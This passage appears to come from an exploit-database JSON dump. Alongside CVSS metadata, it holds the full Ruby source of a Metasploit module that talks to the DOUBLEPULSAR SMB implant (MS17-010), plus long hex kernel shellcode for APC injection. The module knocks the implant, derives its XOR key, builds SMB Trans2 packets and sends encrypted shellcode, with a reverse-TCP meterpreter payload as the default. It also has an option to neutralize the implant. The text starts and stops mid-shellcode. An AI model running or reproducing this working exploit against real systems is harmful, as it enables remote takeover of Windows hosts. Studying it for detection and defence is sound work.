+\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-04] #"}, "lastseen": "2021-09-03T22:12:36", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "7cc01ecc5d3a1070094d7fc4093fa7fa", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-04T22:15:17", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:142548"]}, {"type": "rapid7community", 
"idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-04T22:15:17", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-04T22:15:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 
true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n 